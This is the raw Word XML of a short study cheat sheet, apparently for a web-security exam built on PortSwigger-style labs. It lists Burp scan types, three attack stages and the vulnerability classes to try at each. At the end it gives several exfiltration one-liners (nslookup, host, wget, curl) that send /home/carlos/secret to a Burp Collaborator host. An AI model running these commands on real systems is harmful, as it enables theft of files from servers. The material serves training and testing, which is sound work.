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76CF" w14:textId="7DF0B176" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Active Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D4F9AD" w14:textId="4CF77AA2" w:rsidR="00334C6F" w:rsidRPr="0086143E" w:rsidRDefault="00334C6F" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Scan defined insertion points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5086DF" w14:textId="02B08258" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>HTTP Request Smuggler Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48851294" w14:textId="27BE9734" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Param Miner Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739C29F3" w14:textId="77777777" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72AB14F2" w14:textId="4B11F635" w:rsidR="00E916F4" w:rsidRPr="002E54E6" w:rsidRDefault="00012F12" w:rsidP="00E916F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Stage 1: Access any user account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3757B6" w14:textId="07B42A33" w:rsidR="000D0E47" w:rsidRDefault="000D0E47" w:rsidP="00E916F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Authentication Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2997F3ED" w14:textId="27859F27" w:rsidR="002E54E6" w:rsidRDefault="00FF5E60" w:rsidP="00E916F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Information Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFCD3A2" w14:textId="01A0CC79" w:rsidR="003B4081" w:rsidRDefault="003B4081" w:rsidP="00E916F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DOM-based Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526F1F2F" w14:textId="10D0FCD3" w:rsidR="0086143E" w:rsidRPr="003B4081" w:rsidRDefault="00E916F4" w:rsidP="00E916F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Web cache </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>posoning</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="40B1D0FB" w14:textId="3C7FED57" w:rsidR="009A4381" w:rsidRDefault="00296B56" w:rsidP="00396902">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Host header attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD93C3A" w14:textId="12C0FAE9" w:rsidR="0002514C" w:rsidRDefault="009A4381" w:rsidP="0039690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HTTP Request Smuggling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BB2C4A" w14:textId="77777777" w:rsidR="000D3305" w:rsidRDefault="0002514C" w:rsidP="0002514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SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4709970D" w14:textId="14721C7A" w:rsidR="0002514C" w:rsidRPr="0086143E" w:rsidRDefault="000D3305" w:rsidP="0002514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File Upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC410FA" w14:textId="50C68362" w:rsidR="008240DE" w:rsidRDefault="008240DE" w:rsidP="008240D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XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FF6A17" w14:textId="232E42E3" w:rsidR="00F14004" w:rsidRDefault="00F14004" w:rsidP="00F1400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Directory Traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED7F6CA" w14:textId="77777777" w:rsidR="00907FFA" w:rsidRPr="0086143E" w:rsidRDefault="00907FFA" w:rsidP="00907FFA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Clickjacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C8B516" w14:textId="77777777" w:rsidR="00907FFA" w:rsidRPr="0086143E" w:rsidRDefault="00907FFA" w:rsidP="00F14004">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AAB2D8D" w14:textId="77777777" w:rsidR="00F14004" w:rsidRPr="0086143E" w:rsidRDefault="00F14004" w:rsidP="008240DE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="573929E8" w14:textId="77777777" w:rsidR="0002514C" w:rsidRPr="009A4381" w:rsidRDefault="0002514C" w:rsidP="00396902">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B8D9236" w14:textId="77777777" w:rsidR="008E640E" w:rsidRPr="0086143E" w:rsidRDefault="008E640E" w:rsidP="008E640E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A3D79F5" w14:textId="5CB9EF09" w:rsidR="00E916F4" w:rsidRPr="0086143E" w:rsidRDefault="00E916F4" w:rsidP="00E916F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B159034" w14:textId="7E620336" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Stage 2: </w:t>
      </w:r>
      <w:r w:rsidR="00567ABE" w:rsidRPr="0086143E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ccess the admin interface at /admin</w:t>
      </w:r>
      <w:r w:rsidR="00567ABE" w:rsidRPr="0086143E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>by elevating your privileges or compromising the administrator account</w:t>
      </w:r>
      <w:r w:rsidR="00567ABE" w:rsidRPr="0086143E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFBE81A" w14:textId="77777777" w:rsidR="00FF5E60" w:rsidRPr="002E54E6" w:rsidRDefault="00FF5E60" w:rsidP="00FF5E60">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="074527FB" w14:textId="4E13AEB5" w:rsidR="000D0E47" w:rsidRDefault="000D0E47" w:rsidP="00012F1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Authentication Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112226A8" w14:textId="6035B3F2" w:rsidR="00E916F4" w:rsidRPr="00FF5E60" w:rsidRDefault="00FF5E60" w:rsidP="00012F1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Information Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E154117" w14:textId="406EFEC6" w:rsidR="003B4081" w:rsidRDefault="00830754" w:rsidP="001D18F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DOM-based Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FB9978" w14:textId="7D30CFA9" w:rsidR="001D18F4" w:rsidRDefault="001D18F4" w:rsidP="00E916F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Insecure Deserialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C39B8D9" w14:textId="549B8F83" w:rsidR="0086143E" w:rsidRPr="003B4081" w:rsidRDefault="00E916F4" w:rsidP="00E916F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Web cache </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>posoning</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4F0518D7" w14:textId="6EDD7E03" w:rsidR="009A4381" w:rsidRDefault="00296B56" w:rsidP="00296B56">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Host header attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777B113E" w14:textId="423828BC" w:rsidR="0002514C" w:rsidRDefault="009A4381" w:rsidP="009A4381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HTTP Request Smuggling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582D2629" w14:textId="77777777" w:rsidR="0002514C" w:rsidRPr="0086143E" w:rsidRDefault="0002514C" w:rsidP="0002514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SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E22E2A" w14:textId="77777777" w:rsidR="000D3305" w:rsidRPr="0086143E" w:rsidRDefault="000D3305" w:rsidP="000D3305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File Upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD7725A" w14:textId="32243C2F" w:rsidR="008240DE" w:rsidRDefault="008240DE" w:rsidP="008240D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XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BE8A25" w14:textId="77BDC839" w:rsidR="00F14004" w:rsidRDefault="00F14004" w:rsidP="00F1400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Directory Traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3325B5DC" w14:textId="31F06747" w:rsidR="00F14004" w:rsidRDefault="00972D3A" w:rsidP="008240DE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Oauth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6EB6D380" w14:textId="3A694435" w:rsidR="00B26E36" w:rsidRDefault="00B26E36" w:rsidP="008240D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CORS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736A7307" w14:textId="092BB62D" w:rsidR="004F6531" w:rsidRDefault="004F6531" w:rsidP="008240D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Clickjacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF88CD3" w14:textId="41D164D3" w:rsidR="00E83C31" w:rsidRPr="0086143E" w:rsidRDefault="00E83C31" w:rsidP="008240D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Access Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C67E0F0" w14:textId="77777777" w:rsidR="0002514C" w:rsidRPr="009A4381" w:rsidRDefault="0002514C" w:rsidP="009A4381">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F472C2C" w14:textId="77777777" w:rsidR="009A4381" w:rsidRPr="0086143E" w:rsidRDefault="009A4381" w:rsidP="00296B56">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14AFE066" w14:textId="77777777" w:rsidR="00396902" w:rsidRPr="0086143E" w:rsidRDefault="00396902" w:rsidP="00396902">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AF578D1" w14:textId="129878E1" w:rsidR="00E916F4" w:rsidRPr="0086143E" w:rsidRDefault="00E916F4" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B758776" w14:textId="5518CBC5" w:rsidR="0002514C" w:rsidRPr="0002514C" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Stage 3: </w:t>
      </w:r>
      <w:r w:rsidR="00567ABE" w:rsidRPr="0086143E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Read </w:t>
      </w:r>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>the contents of /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>carlos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>/secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033935E1" w14:textId="77777777" w:rsidR="0002514C" w:rsidRDefault="0002514C" w:rsidP="00E916F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49588E32" w14:textId="5F93AD99" w:rsidR="0086143E" w:rsidRPr="003B4081" w:rsidRDefault="00E916F4" w:rsidP="00E916F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Insecure Deserialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01010902" w14:textId="7F7F80A5" w:rsidR="00396902" w:rsidRDefault="0086143E" w:rsidP="00396902">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Host header attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A216A2" w14:textId="59773DAA" w:rsidR="0002514C" w:rsidRDefault="0002514C" w:rsidP="0002514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HTTP Request Smuggling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C29FCCD" w14:textId="77777777" w:rsidR="0002514C" w:rsidRPr="0086143E" w:rsidRDefault="0002514C" w:rsidP="0002514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SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B11EBA7" w14:textId="77777777" w:rsidR="000D3305" w:rsidRPr="0086143E" w:rsidRDefault="000D3305" w:rsidP="000D3305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File Upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EF514F" w14:textId="06A6430B" w:rsidR="008240DE" w:rsidRPr="0086143E" w:rsidRDefault="008240DE" w:rsidP="008240D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Directory Traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D1A168" w14:textId="77777777" w:rsidR="0002514C" w:rsidRPr="009A4381" w:rsidRDefault="0002514C" w:rsidP="0002514C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CC3C023" w14:textId="77777777" w:rsidR="0002514C" w:rsidRPr="0086143E" w:rsidRDefault="0002514C" w:rsidP="00396902">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49CE392B" w14:textId="77777777" w:rsidR="00E916F4" w:rsidRPr="0086143E" w:rsidRDefault="00E916F4" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47239339" w14:textId="4C21DAA8" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00567ABE" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Command for data exfiltration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107CB6C2" w14:textId="1560E082" w:rsidR="00567ABE" w:rsidRPr="0086143E" w:rsidRDefault="00567ABE" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>nslookup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> `cat /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>carlos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>secret`.BURP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>-COLLABORATOR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0501C386" w14:textId="67A4BDF4" w:rsidR="00567ABE" w:rsidRDefault="00567ABE" w:rsidP="00567ABE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>host `cat /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>carlos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>secret`.BURP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>-COLLABORATOR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361826BD" w14:textId="032954BD" w:rsidR="00C37CB7" w:rsidRPr="0086143E" w:rsidRDefault="00C37CB7" w:rsidP="00567ABE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">host </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>$(</w:t>
      </w:r>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>cat /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>carlos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>/secret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.BURP-COLLABORATOR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EACD18E" w14:textId="5DC0DC58" w:rsidR="00567ABE" w:rsidRPr="0086143E" w:rsidRDefault="00567ABE" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> --post-file /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>carlos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>/secret BURP-COLLABORATOR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD20864" w14:textId="3F957ADE" w:rsidR="00154C7B" w:rsidRPr="0086143E" w:rsidRDefault="00154C7B" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>curl --data @</w:t>
      </w:r>
      <w:r w:rsidR="00C37CB7">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>home/carlos/secret BURP-COLLABORATOR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40918D0E" w14:textId="47A0CB87" w:rsidR="00567ABE" w:rsidRPr="0086143E" w:rsidRDefault="00567ABE" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696594D7" w14:textId="790BF1AA" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
